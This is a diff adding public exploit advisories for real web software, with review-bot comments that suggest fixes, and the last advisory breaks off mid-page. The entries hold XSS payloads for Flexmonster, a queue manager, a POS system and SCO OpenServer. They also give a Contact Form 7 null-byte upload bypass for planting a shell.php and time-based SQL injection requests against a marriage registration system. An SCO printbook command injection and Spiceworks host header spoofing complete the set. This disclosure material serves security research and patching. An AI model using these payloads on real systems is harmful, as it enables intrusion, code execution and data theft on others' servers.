4) Paste the XSS Payload tag and Submit
5) Access the course page on frontend
6) Exploited!


@ -0,0 +1,15 @@
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20140
Cross Site Scripting (XSS) vulnerability in Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
payload:
<svg onload=alert("OpenRemoteReport")><!--


@ -0,0 +1,15 @@
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20141
Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component Under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17.
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
payload:
<svg onload=alert("OLAPTool")><!--


@ -0,0 +1,15 @@
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20142
Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under "Open" Menu in Flexmonster Pivot Table & Charts 2.7.17.
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
payload:
<svg onload=alert("OpenRemoteCSV")><!--


@ -0,0 +1,15 @@
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version: Flexmonster Pivot Table & Charts 2.7.17
# Tested on: Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20139
Cross Site Scripting (XSS) vulnerability in the Remote JSON component
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
payload:
<svg onload=alert("OpenRemoteJSON")><!--


@ -0,0 +1,37 @@
# Exploit Title: Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload
# Date: 12/20/2020
# Exploit Author: Ramón Vila Ferreres (@ramonvfer)
# Vendor Homepage: https://contactform7.com
# Software Link: https://wordpress.org/plugins/contact-form-7/
# Version: 5.3.1 and below
# Tested on: Windows 10 1909, Ubuntu 20.4
Explanation
---------------------------------------------------------------------
ContactForm7 version 5.3.1 and below doesn't properly sanitize
uploaded filenames to prevent Arbitrary File Upload that can lead
to full server takeover in the worst-case scenario.
This happens in the wpcf7_antiscript_file_name function, that fails
to sanitize the provided filename if it ends with any Unicode special
character ranging from U+0000 (null) to U+001F (us).
The function matches both the file name and the file extension against
an exclusion regex. Appending any unicode special character to the
file extension results in a complete bypass of this verification (as
the regex doesn't match) leading to the Unrestricted File Upload.
Exploit
---------------------------------------------------------------------
1. Change the file extension of the file you want to upload (e.g:
"shell.php") to its equivalent with the special character ending (in
this case "shell.php" (appended U+0000))
2. Upload the file using ContactForm7 file upload feature in the
target website.
3. Go to <target.com>/wp-content/uploads/wpcf7_uploads/shell.php
Note the special character at the end
Note that the file upload location may vary as it is configurable.
4. Now you have uploaded your file!


@ -0,0 +1,20 @@
# Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-21
# Google Dork: N/A
# Vendor Homepage: http://codekernel.net/
# Software Link: https://codecanyon.net/item/queue-management-system/22029961
# Affected Version: Version 4.0.0
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Kali Linux
Step 1. Login as admin.
Step 2. Select "Users" from menu and click on "Add User .
Step 3. Insert payload - "><svg/onload=alert(1)> in "Firtst Name" , " Last
Name "and " Email ".
Step 4. Now open "User List " from menu and you will get alert box.
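Review bot: The reproduction steps have typos that make the field names ambiguous: `in "Firtst Name" , " Last Name "and " Email ".` should read `in "First Name", "Last Name" and "Email".`, and `click on "Add User .` is missing its closing quote. The advisory gives no root cause or rendering location beyond `User List`, unlike the other advisories in this commit; one sentence naming the script or template that echoes these fields unencoded would let a maintainer apply output encoding at the right place. `# Patched Version: Unpatched` would be more useful with the vendor-notification date alongside it.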


@ -0,0 +1,18 @@
# Exploit Title: Point of Sale System 1.0 - Multiple Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-18
# Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
# Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS
Step 1. Login to the application with admin credentials
Step 2. Click on "Suppliers" in header and select "Add Supplier".
Step 3. Input "<script>alert("r0b0tG4nG")</script>" in all fields of the form.
Note: Stored XSS vulnerability can also be found "Customers Page" when you select "Add New Customer". Apply Same method above to execute Stored XSS.
Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Suppliers Page", your XSS Payloads will be triggered.
Note: Stored XSS can also be triggered when you click on "Products Page" and select "Add New Product".
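Review bot: `# Affected Version: Version 1` disagrees with the title's `1.0`; the two should match so the file and its CSV index row agree. The steps name the forms (Add Supplier, Add New Customer, Add New Product) but not the PHP files or parameters that store and echo the values unencoded, which the OMRS advisory in this same commit does provide by quoting the vulnerable code; adding the source locations would let a maintainer fix the output encoding rather than only reproduce the alert. Step 4 and its note could be merged into one sentence: `Step 4. Click "Save"; the payloads fire whenever the Suppliers, Customers or Products page is viewed.`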


@ -0,0 +1,91 @@
# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
# Date: 12-21-2020
# Exploit Authors: Andrea Bruschi, Raffaele Sabato
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
I DESCRIPTION
========================================================================
A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account.
Following the vulnerable code:
$sdata=$_POST['searchdata'];
?>
<h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>
<table id="datatable1" class="table display responsive nowrap">
<thead>
<tr>
<th class="wd-15p">S.No</th>
<th class="wd-15p">Reg Number</th>
<th class="wd-20p">Husband Name</th>
<th class="wd-10p">Date of Marriage</th>
<th class="wd-10p">Status</th>
<th class="wd-25p">Action</th>
</tr>
</thead>
<tbody>
<?php
$uid=$_SESSION['omrsuid'];
$sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";
$query = $dbh -> prepare($sql);
$query->execute();
$results=$query->fetchAll(PDO::FETCH_OBJ);
II PROOF OF CONCEPT
========================================================================
## Request user
POST /omrs/user/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/user/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="search"
-----------------------------197361427118054779422510078884--
## Request admin
POST /omrs/admin/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/admin/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="search"
-----------------------------267799269040335247322746025522--
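Review bot: The quoted vulnerable code at `<h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>` also echoes the raw POST value into HTML, i.e. a reflected XSS in the same handler that the advisory does not mention; worth a sentence so that a fix covers both sinks. The SQL fix is to bind `$sdata` instead of interpolating it into the already-prepared statement: `$sql="SELECT * from tblregistration where RegistrationNumber like :sdata && UserID=:uid";` and `$query->execute([':sdata' => "$sdata%", ':uid' => $uid]);`, plus `htmlspecialchars($sdata)` at the echo. In the description, `omsr/admin/search.php` is a typo for `omrs/admin/search.php` (the admin request below uses `/omrs/admin/search.php`). Both requests carry the identical `PHPSESSID` cookie even though one is a user session and the other an admin session; presumably a copy/paste artefact, but it should be corrected so the admin PoC is reproducible as written.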


@ -0,0 +1,128 @@
# Exploit Title: SCO Openserver 5.0.7 - 'section' Reflected XSS
# Google Dork: inurl:/cgi-bin/manlist?section
# Discovered Date: 14/06/2020
# Author: Ramikan
# Vendor Homepage: https://www.xinuos.com/products
# Software Link: https://www.sco.com/products/openserver507/-overview
# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
# Tested on: SCO Openserver 5.0.7 & version 6
# CVE : CVE-2020-25495
*************************************************************************************************************************************
Vulnerability :Refelected XSS & HTML Injection
*************************************************************************************************************************************
A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
Affected URL:http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script>
Affected Paramenter: section
*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1
Host: 192.168.20.48:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
*************************************************************************************************************************************
Response:
*************************************************************************************************************************************
HTTP/1.1 200 OK
Date: Thu, 03 Sep 2020 17:08:51 GMT
Server: Apache/1.3.36 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2680
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title>
<META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'>
<link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body bgcolor="#FFFFFF" topmargin="0" marginheight="0">
<!-- Begin DocView navigation toolbar -->
<!--htdig_noindex-->
<table
class=dvtb
width="100%"
cellpadding=0
cellspacing=0
border=0
style="padding: 0;"
>
<tr valign=top class=dvtb>
<td class=dvdb>
<table
class=dvtb
cellpadding=3
cellspacing=1
border=0
bgcolor=#FFFFFF
width=611
>
<tr class=dvtb>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
DOC HOME
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
SITE MAP
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
MAN PAGES
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
GNU INFO
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
SEARCH
</a></td>
</tr>
</table>
</td>
<td class=dvtb align="left" width=100%>
<table
class=dvtb
cellpadding="3"
cellspacing="1"
border="0"
width="100%"
bgcolor="#FFFFFF"
>
<tr class=dvtb valign="top">
<td class=dvtb style="background: #2059A6;" align=center width=100%>
<a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" >
&nbsp;
</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
<!--/htdig_noindex-->
<!-- End DocView navigation toolbar -->
<h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE>
</PRE>
</body></html>
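Review bot: The captured response shows the `section` value reflected at two sinks — the `<title>` at `<title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title>` and the body `<h1>` near the end — so the fix in `manlist` has to encode the parameter in both places (e.g. `encode_entities` from HTML::Entities before interpolation, assuming the mod_perl handler builds the page by string concatenation, which the output suggests); the advisory should say so rather than leaving it to the reader. Typos in the header: `Refelected` → `Reflected` and `Paramenter` → `Parameter`. `# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.` would read better as `# Affected Version: 5.0.7 and 6 (tested); other versions may be affected.`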


@ -0,0 +1,51 @@
# Exploit Title: SCO Openserver 5.0.7 - 'outputform' Command Injection
# Google Dork: inurl:/cgi-bin/manlist?section
# Discovered Date: 04/09/2020
# Author: Ramikan
# Vendor Homepage: https://www.xinuos.com/products/
# Software Link: https://www.sco.com/products/openserver507/-overview
# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
# Tested on: SCO Openserver 5.0.7 & version 6
# CVE : CVE-2020-25494
*************************************************************************************************************************************
Vulnerability :OS Command Injection
*************************************************************************************************************************************
The outputform, toclevels parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability. It is also possible to cause the application to interact with an external domain, to verify that a command was executed. The payload |nslookup -q=cname mytest.com.& was submitted in the parameters. The application performed a DNS lookup for the specified domain name. Additionally, the payload |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 was submitted in the parameters. The application took 20960 milliseconds to respond to the request, compared with 1348 milliseconds for the original request.
Affected URL:http://host:8457/cgi-bin/printbook
Affected Paramenter: outputform, toclevels
*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
POST /cgi-bin/printbook HTTP/1.1
Host: 10.0.0.45:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.45:8457/en/Navpages/printmap.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS.
*************************************************************************************************************************************
Response:
*************************************************************************************************************************************
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2020 11:17:52 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 3188
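Review bot: `# Google Dork: inurl:/cgi-bin/manlist?section` is carried over from the sibling `section` XSS advisory and points at `manlist`, while this issue is in `/cgi-bin/printbook` (see `Affected URL` below); correct the dork to the `printbook` path or drop the line. The description lists `outputform, toclevels` as injectable, but the sample request only places a payload in `outputform` (`toclevels=3` is untouched), so the `toclevels` claim is not supported by the PoC as written. The response section stops at the headers with `Content-Length: 3188` and no body, so the timing evidence (20960 ms vs 1348 ms) is asserted but not shown; a request/response timestamp pair would make it verifiable. The defensive fix is to stop passing these parameters through a shell at all — build the print command as an argument list (Perl's list-form `system`/`open`) and validate `outputform` against the known output formats. `Paramenter` → `Parameter`.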


@ -0,0 +1,352 @@
# Exploit Title: Spiceworks 7.5 - HTTP Header Injection
# Google Dork: inurl:/pro_users/login
# Discovered Date: 15/09/2020
# Exploit Author: Ramikan
# Vendor Homepage: https://www.spiceworks.com
# Affected Version: 7.5.7.0 may be others.
# Tested On Version: 7.5.7.0
# CVE : CVE-2020-25901
Vulnerability: Host Header Injection
Description:
Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
An issue was discovered in Spiceworks version 7.5.7.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack.
Request:
GET / HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""}
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 302 Found
Date: Tue, 15 Sep 2020 12:46:52 GMT
Cache-Control: no-cache
X-Runtime: 0
Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly
Location: http://google.com/pro_users/login
Content-Length: 99
Connection: close
Content-Type: text/html; charset=utf-8
<html><body>You are being <a href="http://google.com/pro_users/login">redirected</a>.</body></html>
Request:2
GET /pro_users/login HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""}
Upgrade-Insecure-Requests: 1
Response:2 (Forgot your password)Link replaced with domain in the header.
HTTP/1.1 200 OK
Date: Tue, 15 Sep 2020 12:48:26 GMT
Cache-Control: private, max-age=0, must-revalidate
X-UA-Compatible: IE=edge,chrome=1
X-Runtime: 0
ETag: "77c8f98180ec3f6d4f2fcc8dcd796462"
Set-Cookie: compatibility_test=testing; path=/
Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly
Content-Length: 9875
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html>
<html lang="en" class="no-js desktop">
<head>
<meta charset="utf-8" />
<title>Spiceworks</title>
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
<meta name="author" content="Spiceworks, Inc." />
<meta name="description" content="Network management made simple" />
<meta name="version" content="unknown" />
<noscript>
<meta http-equiv="refresh" content="2;url=/sessions/incompatible" />
</noscript>
<link href="/assets/sui.css?7500070" media="all" rel="stylesheet" type="text/css" />
<link href="/assets/base.css?7500070" media="all" rel="stylesheet" type="text/css" />
<link href="/assets/application.css?7500070" media="all" rel="stylesheet" type="text/css" />
<!--[if IE]><link href="/stylesheets/hacks.ie.css?7500070" media="all" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 7]><link href="/stylesheets/hacks.ie7.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]><link href="/stylesheets/hacks.ie8.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/stylesheets/print.css?7500070" media="print" rel="stylesheet" type="text/css" />
<link href="/assets/sui-print.css?7500070" media="print" rel="stylesheet" type="text/css" />
<link href="/assets/wizard.css?7500070" media="screen" rel="stylesheet" type="text/css" />
<script src="/assets/sui_bundle.js?7500070" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-314222-21']);
_gaq.push(['_setDomainName', 'none']);
_gaq.push(['_setAllowLinker', true]);
_gaq.push(['_trackPageview']);
_gaq.push(['_setCustomVar', 1, '_v', '7.5.00070', 3]);
_gaq.push(['_setCustomVar', 2, '_d', 'xl', 3]);
_gaq.push(['_setCustomVar', 3, '_u', '2', 3]);
_gaq.push(['_setCustomVar', 4, '_ul', 'anonymous', 2]);
_gaq.push(['_setCustomVar', 5, '_m', 'anonymous', 2]);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
SPICEWORKS.ready(function(){ SPICEWORKS.fire('app:ready'); });
document.observe('dom:loaded', function(){ SPICEWORKS.fire('ready'); });
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
(function($){
$(document).ready(function(){
$('#flash-notice-message').delay(9000).slideUp(300);
});
})(jQuery);
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var gekko = gekko || {};
gekko.cmd = gekko.cmd || [];
gekko.times = gekko.times || [];
gekko.times.push({ gekkoRequest: new Date().getTime() });
gekko.client = gekko.client || {};
gekko.client.app = {
'id': 'SWD',
'env': 'p',
'version': '7.5.00070'
};
gekko.client.user = {};
gekko.client.user.uuid = 'b7f707b6-f574-44bb-a766-986fc5851a03';
//]]>
</script>
<script async="false" src="//gekko.spiceworks.com/gekko.js" type="text/javascript"></script>
<script async="true" type='text/javascript' src='//www.googletagservices.com/tag/js/gpt.js'></script>
<script type="text/javascript">
//<![CDATA[
gekko.cmd.push({cmd: function() { gekko.setAnalytics('_v', '7.5.00070'); }, important: true});
//]]>
</script>
<script>
var SWUFR = SWUFR || {};
SWUFR.cmd = SWUFR.cmd || [];
</script>
<script async src="//gekko.spiceworks.com/swufr.js"></script>
<script>
SWUFR.cmd.push(function() {
SWUFR.ufr.installed()
});
</script>
</head>
<!--[if lt IE 7]> <body class="left-registerlogin-desktop sui-opt-in ie ie6 lte9 lte8 lte7 desktop"> <![endif]-->
<!--[if IE 7]> <body class="left-register login-desktop sui-opt-in ie ie7 lte9 lte8 lte7 desktop"> <![endif]-->
<!--[if IE 8]> <body class="left-register login-desktop sui-opt-in ie ie8 lte9 lte8 desktop"> <![endif]-->
<!--[if IE 9]> <body class="left-register login-desktop sui-opt-in ie ie9 lte9 desktop"> <![endif]-->
<!--[if !IE]><!--> <body class="left-register login-desktop sui-opt-in no-ie desktop"> <!--<![endif]-->
<header class="site-navigation sui-opt-in">
<nav class="global-nav affix" data-navbar="global" data-search-autocomplete-min-length="">
<div class="nav-fluid-container">
<a href="/" class="global-nav_brand">Home</a>
<img src="//static.spiceworks.com/assets/masthead/print_logo.png" class='global-nav_print-logo' />
</div>
</nav>
</header>
<!--[if lte IE 9]>
<div class="modal hide has-footer-in-body" data-backdrop="true" data-isdraggable="false" data-keyboard="false" id="install_chrome_frame"><div class="modal-header"> <h3>I'm gonna have to go ahead and ask you to use a different browser.</h3></div><div class="modal-body">
<img id="lumberg" src="/images/other/yeeeaaah.png" style="float:left; width:200px; ">
<div class="sui-opt-in" id="chrome_frame_install" style="padding-left: 10px; overflow:hidden; min-height:150px">
<p style="padding-top:10px; font-size:13px">Yeaaaah… what's happening? </p>
<p>We went ahead and stopped supporting Internet Explorer 9 and older in the Spiceworks app (IE10+ is now required), so if you could just go ahead and upgrade IE, that would be great… </p>
<p style="padding-top:10px; font-size:11px; color: #AAA;">(Doesn't take long to install, and makes Spiceworks so much faster!)</p>
</div>
<div class="sui-opt-in" id="chrome_frame_reload" style="padding-left: 10px; overflow:hidden;">
<h4 class="">
<strong>
Whoops, looks like you might have gotten stuck.
</strong>
</h4>
</div>
<div class="footer-actions blue-permission-granted">
<a class="sui-bttn ieUpgrade" href="#" id="ieUpgrade" onclick=" upgradeIE(); ; return false;">Upgrade Internet Explorer</a>
</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
jQuery(function(){
